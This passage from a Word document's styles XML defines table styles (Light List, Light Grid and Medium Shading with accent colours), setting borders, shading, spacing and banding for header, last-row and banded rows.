        <w:top w:val="single" w:color="9D936F" w:themeColor="accent6" w:sz="8" w:space="0"/>
        <w:bottom w:val="single" w:color="9D936F" w:themeColor="accent6"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9D936F" w:themeColor="accent6" w:sz="8" w:space="0"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="single" w:color="9D936F" w:themeColor="accent6" w:sz="8" w:space="0"/>
          <w:right w:val="nil"/>
          <w:insideH w:val="nil"/>
          <w:insideV w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:color="9D936F" w:themeColor="accent6" w:sz="8" w:space="0"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="single" w:color="9D936F" w:themeColor="accent6"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E6E4DB" w:themeFill="accent6" w:themeFillTint="3F"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:left w:val="nil"/>
          <w:right w:val="nil"/>
          <w:insideH w:val="nil"/>
          <w:insideV w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="E6E4DB" w:themeFill="accent6" w:themeFillTint="3F"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="158">
    <w:name w:val="Light List"/>
    <w:basedOn w:val="106"/>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000000" w:themeFill="text1"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>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159">
    <w:name w:val="Light List Accent 1"/>
    <w:basedOn w:val="106"/>
    <w:uiPriority w:val="61"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:tblPr>
      <w:tblBorders>
        <w:top w:val="single" w:color="7E97AD" w:themeColor="accent1" w:sz="8" w:space="0"/>
        <w:left w:val="single" w:color="7E97AD" w:themeColor="accent1" w:sz="8" w:space="0"/>
        <w:bottom w:val="single" w:color="7E97AD" w:themeColor="accent1" w:sz="8" w:space="0"/>
        <w:right w:val="single" w:color="7E97AD" w:themeColor="accent1"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7E97AD" w:themeFill="accent1"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="double" w:color="7E97AD" w:themeColor="accent1" w:sz="6" w:space="0"/>
          <w:left w:val="single" w:color="7E97AD" w:themeColor="accent1" w:sz="8" w:space="0"/>
          <w:bottom w:val="single" w:color="7E97AD" w:themeColor="accent1" w:sz="8" w:space="0"/>
          <w:right w:val="single" w:color="7E97AD" w:themeColor="accent1" w:sz="8" w:space="0"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Vert">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tblStylePr w:type="band1Horz">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style>
  <w:style w:type="table" w:styleId="160">
    <w:name w:val="Light List Accent 2"/>
    <w:basedOn w:val="106"/>
    <w:uiPriority w:val="61"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:tblPr>
      <w:tblBorders>
        <w:top w:val="single" w:color="CC8E60" w:themeColor="accent2" w:sz="8" w:space="0"/>
        <w:left w:val="single" w:color="CC8E60" w:themeColor="accent2" w:sz="8" w:space="0"/>
        <w:bottom w:val="single" w:color="CC8E60" w:themeColor="accent2" w:sz="8" w:space="0"/>
        <w:right w:val="single" w:color="CC8E60" w:themeColor="accent2"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CC8E60" w:themeFill="accent2"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="double" w:color="CC8E60" w:themeColor="accent2" w:sz="6" w:space="0"/>
          <w:left w:val="single" w:color="CC8E60" w:themeColor="accent2" w:sz="8" w:space="0"/>
          <w:bottom w:val="single" w:color="CC8E60" w:themeColor="accent2" w:sz="8" w:space="0"/>
          <w:right w:val="single" w:color="CC8E60" w:themeColor="accent2" w:sz="8" w:space="0"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Vert">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tblStylePr w:type="band1Horz">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style>
  <w:style w:type="table" w:styleId="161">
    <w:name w:val="Light List Accent 3"/>
    <w:basedOn w:val="106"/>
    <w:uiPriority w:val="61"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:tblPr>
      <w:tblBorders>
        <w:top w:val="single" w:color="7A6A60" w:themeColor="accent3" w:sz="8" w:space="0"/>
        <w:left w:val="single" w:color="7A6A60" w:themeColor="accent3" w:sz="8" w:space="0"/>
        <w:bottom w:val="single" w:color="7A6A60" w:themeColor="accent3" w:sz="8" w:space="0"/>
        <w:right w:val="single" w:color="7A6A60" w:themeColor="accent3"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7A6A60" w:themeFill="accent3"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="double" w:color="7A6A60" w:themeColor="accent3" w:sz="6" w:space="0"/>
          <w:left w:val="single" w:color="7A6A60" w:themeColor="accent3" w:sz="8" w:space="0"/>
          <w:bottom w:val="single" w:color="7A6A60" w:themeColor="accent3" w:sz="8" w:space="0"/>
          <w:right w:val="single" w:color="7A6A60" w:themeColor="accent3" w:sz="8" w:space="0"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Vert">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tblStylePr w:type="band1Horz">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style>
  <w:style w:type="table" w:styleId="162">
    <w:name w:val="Light List Accent 4"/>
    <w:basedOn w:val="106"/>
    <w:uiPriority w:val="61"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:tblPr>
      <w:tblBorders>
        <w:top w:val="single" w:color="B4936D" w:themeColor="accent4" w:sz="8" w:space="0"/>
        <w:left w:val="single" w:color="B4936D" w:themeColor="accent4" w:sz="8" w:space="0"/>
        <w:bottom w:val="single" w:color="B4936D" w:themeColor="accent4" w:sz="8" w:space="0"/>
        <w:right w:val="single" w:color="B4936D" w:themeColor="accent4"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B4936D" w:themeFill="accent4"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="double" w:color="B4936D" w:themeColor="accent4" w:sz="6" w:space="0"/>
          <w:left w:val="single" w:color="B4936D" w:themeColor="accent4" w:sz="8" w:space="0"/>
          <w:bottom w:val="single" w:color="B4936D" w:themeColor="accent4" w:sz="8" w:space="0"/>
          <w:right w:val="single" w:color="B4936D" w:themeColor="accent4" w:sz="8" w:space="0"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Vert">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tblStylePr w:type="band1Horz">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style>
  <w:style w:type="table" w:styleId="163">
    <w:name w:val="Light List Accent 5"/>
    <w:basedOn w:val="106"/>
    <w:uiPriority w:val="61"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:tblPr>
      <w:tblBorders>
        <w:top w:val="single" w:color="67787B" w:themeColor="accent5" w:sz="8" w:space="0"/>
        <w:left w:val="single" w:color="67787B" w:themeColor="accent5" w:sz="8" w:space="0"/>
        <w:bottom w:val="single" w:color="67787B" w:themeColor="accent5" w:sz="8" w:space="0"/>
        <w:right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67787B" w:themeFill="accent5"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="double" w:color="67787B" w:themeColor="accent5" w:sz="6" w:space="0"/>
          <w:left w:val="single" w:color="67787B" w:themeColor="accent5" w:sz="8" w:space="0"/>
          <w:bottom w:val="single" w:color="67787B" w:themeColor="accent5" w:sz="8" w:space="0"/>
          <w:right w:val="single" w:color="67787B" w:themeColor="accent5" w:sz="8" w:space="0"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Vert">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Horz">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style>
  <w:style w:type="table" w:styleId="164">
    <w:name w:val="Light List Accent 6"/>
    <w:basedOn w:val="106"/>
    <w:uiPriority w:val="61"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:tblPr>
      <w:tblBorders>
        <w:top w:val="single" w:color="9D936F" w:themeColor="accent6" w:sz="8" w:space="0"/>
        <w:left w:val="single" w:color="9D936F" w:themeColor="accent6" w:sz="8" w:space="0"/>
        <w:bottom w:val="single" w:color="9D936F" w:themeColor="accent6" w:sz="8" w:space="0"/>
        <w:right w:val="single" w:color="9D936F" w:themeColor="accent6"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9D936F" w:themeFill="accent6"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="double" w:color="9D936F" w:themeColor="accent6" w:sz="6" w:space="0"/>
          <w:left w:val="single" w:color="9D936F" w:themeColor="accent6" w:sz="8" w:space="0"/>
          <w:bottom w:val="single" w:color="9D936F" w:themeColor="accent6" w:sz="8" w:space="0"/>
          <w:right w:val="single" w:color="9D936F" w:themeColor="accent6" w:sz="8" w:space="0"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Vert">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tblStylePr w:type="band1Horz">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style>
  <w:style w:type="table" w:styleId="165">
    <w:name w:val="Light Grid"/>
    <w:basedOn w:val="106"/>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166">
    <w:name w:val="Light Grid Accent 1"/>
    <w:basedOn w:val="106"/>
    <w:uiPriority w:val="62"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:tblPr>
      <w:tblBorders>
        <w:top w:val="single" w:color="7E97AD" w:themeColor="accent1" w:sz="8" w:space="0"/>
        <w:left w:val="single" w:color="7E97AD" w:themeColor="accent1" w:sz="8" w:space="0"/>
        <w:bottom w:val="single" w:color="7E97AD" w:themeColor="accent1" w:sz="8" w:space="0"/>
        <w:right w:val="single" w:color="7E97AD" w:themeColor="accent1" w:sz="8" w:space="0"/>
        <w:insideH w:val="single" w:color="7E97AD" w:themeColor="accent1" w:sz="8" w:space="0"/>
        <w:insideV w:val="single" w:color="7E97AD" w:themeColor="accent1"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7E97AD" w:themeColor="accent1" w:sz="8" w:space="0"/>
          <w:left w:val="single" w:color="7E97AD" w:themeColor="accent1" w:sz="8" w:space="0"/>
          <w:bottom w:val="single" w:color="7E97AD" w:themeColor="accent1" w:sz="18" w:space="0"/>
          <w:right w:val="single" w:color="7E97A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7E97AD" w:themeColor="accent1" w:sz="6" w:space="0"/>
          <w:left w:val="single" w:color="7E97AD" w:themeColor="accent1" w:sz="8" w:space="0"/>
          <w:bottom w:val="single" w:color="7E97AD" w:themeColor="accent1" w:sz="8" w:space="0"/>
          <w:right w:val="single" w:color="7E97A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tblStylePr w:type="band1Vert">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shd w:val="clear" w:color="auto" w:fill="DFE5EA" w:themeFill="accent1" w:themeFillTint="3F"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">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insideV w:val="single" w:sz="8" w:space="0"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="DFE5EA" w:themeFill="accent1" w:themeFillTint="3F"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band2Horz">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insideV w:val="single" w:sz="8" w:space="0"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="167">
    <w:name w:val="Light Grid Accent 2"/>
    <w:basedOn w:val="106"/>
    <w:uiPriority w:val="62"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:tblPr>
      <w:tblBorders>
        <w:top w:val="single" w:color="CC8E60" w:themeColor="accent2" w:sz="8" w:space="0"/>
        <w:left w:val="single" w:color="CC8E60" w:themeColor="accent2" w:sz="8" w:space="0"/>
        <w:bottom w:val="single" w:color="CC8E60" w:themeColor="accent2" w:sz="8" w:space="0"/>
        <w:right w:val="single" w:color="CC8E60" w:themeColor="accent2" w:sz="8" w:space="0"/>
        <w:insideH w:val="single" w:color="CC8E60" w:themeColor="accent2" w:sz="8" w:space="0"/>
        <w:insideV w:val="single" w:color="CC8E60" w:themeColor="accent2"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CC8E60" w:themeColor="accent2" w:sz="8" w:space="0"/>
          <w:left w:val="single" w:color="CC8E60" w:themeColor="accent2" w:sz="8" w:space="0"/>
          <w:bottom w:val="single" w:color="CC8E60" w:themeColor="accent2" w:sz="18" w:space="0"/>
          <w:right w:val="single" w:color="CC8E60"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CC8E60" w:themeColor="accent2" w:sz="6" w:space="0"/>
          <w:left w:val="single" w:color="CC8E60" w:themeColor="accent2" w:sz="8" w:space="0"/>
          <w:bottom w:val="single" w:color="CC8E60" w:themeColor="accent2" w:sz="8" w:space="0"/>
          <w:right w:val="single" w:color="CC8E60"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tblStylePr w:type="band1Vert">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shd w:val="clear" w:color="auto" w:fill="F2E3D7" w:themeFill="accent2" w:themeFillTint="3F"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">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insideV w:val="single" w:sz="8" w:space="0"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="F2E3D7" w:themeFill="accent2" w:themeFillTint="3F"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band2Horz">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insideV w:val="single" w:sz="8" w:space="0"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="168">
    <w:name w:val="Light Grid Accent 3"/>
    <w:basedOn w:val="106"/>
    <w:uiPriority w:val="62"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:tblPr>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7A6A60" w:themeColor="accent3" w:sz="8" w:space="0"/>
          <w:left w:val="single" w:color="7A6A60" w:themeColor="accent3" w:sz="8" w:space="0"/>
          <w:bottom w:val="single" w:color="7A6A60" w:themeColor="accent3" w:sz="18" w:space="0"/>
          <w:right w:val="single" w:color="7A6A60"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7A6A60" w:themeColor="accent3" w:sz="6" w:space="0"/>
          <w:left w:val="single" w:color="7A6A60" w:themeColor="accent3" w:sz="8" w:space="0"/>
          <w:bottom w:val="single" w:color="7A6A60" w:themeColor="accent3" w:sz="8" w:space="0"/>
          <w:right w:val="single" w:color="7A6A60"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tblStylePr w:type="band1Vert">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shd w:val="clear" w:color="auto" w:fill="DFD9D6" w:themeFill="accent3" w:themeFillTint="3F"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">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insideV w:val="single" w:sz="8" w:space="0"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="DFD9D6" w:themeFill="accent3" w:themeFillTint="3F"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band2Horz">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insideV w:val="single" w:sz="8" w:space="0"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="169">
    <w:name w:val="Light Grid Accent 4"/>
    <w:basedOn w:val="106"/>
    <w:uiPriority w:val="62"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:tblPr>
      <w:tblBorders>
        <w:top w:val="single" w:color="B4936D" w:themeColor="accent4" w:sz="8" w:space="0"/>
        <w:left w:val="single" w:color="B4936D" w:themeColor="accent4" w:sz="8" w:space="0"/>
        <w:bottom w:val="single" w:color="B4936D" w:themeColor="accent4" w:sz="8" w:space="0"/>
        <w:right w:val="single" w:color="B4936D" w:themeColor="accent4" w:sz="8" w:space="0"/>
        <w:insideH w:val="single" w:color="B4936D" w:themeColor="accent4" w:sz="8" w:space="0"/>
        <w:insideV w:val="single" w:color="B4936D" w:themeColor="accent4"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B4936D" w:themeColor="accent4" w:sz="8" w:space="0"/>
          <w:left w:val="single" w:color="B4936D" w:themeColor="accent4" w:sz="8" w:space="0"/>
          <w:bottom w:val="single" w:color="B4936D" w:themeColor="accent4" w:sz="18" w:space="0"/>
          <w:right w:val="single" w:color="B4936D"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B4936D" w:themeColor="accent4" w:sz="6" w:space="0"/>
          <w:left w:val="single" w:color="B4936D" w:themeColor="accent4" w:sz="8" w:space="0"/>
          <w:bottom w:val="single" w:color="B4936D" w:themeColor="accent4" w:sz="8" w:space="0"/>
          <w:right w:val="single" w:color="B4936D"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tblStylePr w:type="band1Vert">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shd w:val="clear" w:color="auto" w:fill="ECE4DA" w:themeFill="accent4" w:themeFillTint="3F"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">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insideV w:val="single" w:sz="8" w:space="0"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="ECE4DA" w:themeFill="accent4" w:themeFillTint="3F"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band2Horz">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insideV w:val="single" w:sz="8" w:space="0"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="170">
    <w:name w:val="Light Grid Accent 5"/>
    <w:basedOn w:val="106"/>
    <w:uiPriority w:val="62"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:p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67787B" w:themeColor="accent5" w:sz="8" w:space="0"/>
          <w:left w:val="single" w:color="67787B" w:themeColor="accent5" w:sz="8" w:space="0"/>
          <w:bottom w:val="single" w:color="67787B" w:themeColor="accent5" w:sz="18" w:space="0"/>
          <w:right w:val="single" w:color="67787B"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67787B" w:themeColor="accent5" w:sz="6" w:space="0"/>
          <w:left w:val="single" w:color="67787B" w:themeColor="accent5" w:sz="8" w:space="0"/>
          <w:bottom w:val="single" w:color="67787B" w:themeColor="accent5" w:sz="8" w:space="0"/>
          <w:right w:val="single" w:color="67787B"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Vert">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shd w:val="clear" w:color="auto" w:fill="D8DEDF" w:themeFill="accent5" w:themeFillTint="3F"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">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shd w:val="clear" w:color="auto" w:fill="D8DEDF" w:themeFill="accent5" w:themeFillTint="3F"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band2Horz">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tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="171">
    <w:name w:val="Light Grid Accent 6"/>
    <w:basedOn w:val="106"/>
    <w:uiPriority w:val="62"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:tblPr>
      <w:tblBorders>
        <w:top w:val="single" w:color="9D936F" w:themeColor="accent6" w:sz="8" w:space="0"/>
        <w:left w:val="single" w:color="9D936F" w:themeColor="accent6" w:sz="8" w:space="0"/>
        <w:bottom w:val="single" w:color="9D936F" w:themeColor="accent6" w:sz="8" w:space="0"/>
        <w:right w:val="single" w:color="9D936F" w:themeColor="accent6" w:sz="8" w:space="0"/>
        <w:insideH w:val="single" w:color="9D936F" w:themeColor="accent6" w:sz="8" w:space="0"/>
        <w:insideV w:val="single" w:color="9D936F" w:themeColor="accent6"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9D936F" w:themeColor="accent6" w:sz="8" w:space="0"/>
          <w:left w:val="single" w:color="9D936F" w:themeColor="accent6" w:sz="8" w:space="0"/>
          <w:bottom w:val="single" w:color="9D936F" w:themeColor="accent6" w:sz="18" w:space="0"/>
          <w:right w:val="single" w:color="9D936F"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9D936F" w:themeColor="accent6" w:sz="6" w:space="0"/>
          <w:left w:val="single" w:color="9D936F" w:themeColor="accent6" w:sz="8" w:space="0"/>
          <w:bottom w:val="single" w:color="9D936F" w:themeColor="accent6" w:sz="8" w:space="0"/>
          <w:right w:val="single" w:color="9D936F"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tblStylePr w:type="band1Vert">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shd w:val="clear" w:color="auto" w:fill="E6E4DB" w:themeFill="accent6" w:themeFillTint="3F"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">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insideV w:val="single" w:sz="8" w:space="0"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="E6E4DB" w:themeFill="accent6" w:themeFillTint="3F"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band2Horz">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insideV w:val="single" w:sz="8" w:space="0"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="172">
    <w:name w:val="Medium Shading 1"/>
    <w:basedOn w:val="106"/>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blLayout w:type="fixed"/>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BFBFBF" w:themeFill="text1" w:themeFillTint="3F"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:insideH w:val="nil"/>
          <w:insideV w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF" w:themeFill="text1" w:themeFillTint="3F"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band2Horz">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:insideH w:val="nil"/>
          <w:insideV w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="173">
    <w:name w:val="Medium Shading 1 Accent 1"/>
    <w:basedOn w:val="106"/>
    <w:uiPriority w:val="63"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:tblPr>
      <w:tblBorders>
        <w:top w:val="single" w:color="9EB1C1" w:themeColor="accent1" w:themeTint="BF" w:sz="8" w:space="0"/>
        <w:left w:val="single" w:color="9EB1C1" w:themeColor="accent1" w:themeTint="BF" w:sz="8" w:space="0"/>
        <w:bottom w:val="single" w:color="9EB1C1" w:themeColor="accent1" w:themeTint="BF" w:sz="8" w:space="0"/>
        <w:right w:val="single" w:color="9EB1C1" w:themeColor="accent1" w:themeTint="BF" w:sz="8" w:space="0"/>
        <w:insideH w:val="single" w:color="9EB1C1" w:themeColor="accent1"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9EB1C1" w:themeColor="accent1" w:themeTint="BF" w:sz="8" w:space="0"/>
          <w:left w:val="single" w:color="9EB1C1" w:themeColor="accent1" w:themeTint="BF" w:sz="8" w:space="0"/>
          <w:bottom w:val="single" w:color="9EB1C1" w:themeColor="accent1" w:themeTint="BF" w:sz="8" w:space="0"/>
          <w:right w:val="single" w:color="9EB1C1" w:themeColor="accent1" w:themeTint="BF" w:sz="8" w:space="0"/>
          <w:insideH w:val="nil"/>
          <w:insideV w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="7E97AD" w:themeFill="accent1"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="double" w:color="9EB1C1" w:themeColor="accent1" w:themeTint="BF" w:sz="6" w:space="0"/>
          <w:left w:val="single" w:color="9EB1C1" w:themeColor="accent1" w:themeTint="BF" w:sz="8" w:space="0"/>
          <w:bottom w:val="single" w:color="9EB1C1" w:themeColor="accent1" w:themeTint="BF" w:sz="8" w:space="0"/>
          <w:right w:val="single" w:color="9EB1C1" w:themeColor="accent1"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DFE5EA" w:themeFill="accent1" w:themeFillTint="3F"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:insideH w:val="nil"/>
          <w:insideV w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="DFE5EA" w:themeFill="accent1" w:themeFillTint="3F"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band2Horz">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:insideH w:val="nil"/>
          <w:insideV w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="174">
    <w:name w:val="Medium Shading 1 Accent 2"/>
    <w:basedOn w:val="106"/>
    <w:uiPriority w:val="63"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:tblPr>
      <w:tbl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single" w:color="D8AA87" w:themeColor="accent2"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nil"/>
          <w:insideV w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="CC8E60" w:themeFill="accent2"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="double" w:color="D8AA87" w:themeColor="accent2" w:themeTint="BF" w:sz="6" w:space="0"/>
          <w:left w:val="single" w:color="D8AA87" w:themeColor="accent2" w:themeTint="BF" w:sz="8" w:space="0"/>
          <w:bottom w:val="single" w:color="D8AA87" w:themeColor="accent2" w:themeTint="BF" w:sz="8" w:space="0"/>
          <w:right w:val="single" w:color="D8AA87" w:themeColor="accent2"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F2E3D7" w:themeFill="accent2" w:themeFillTint="3F"/>
      </w:tcPr>
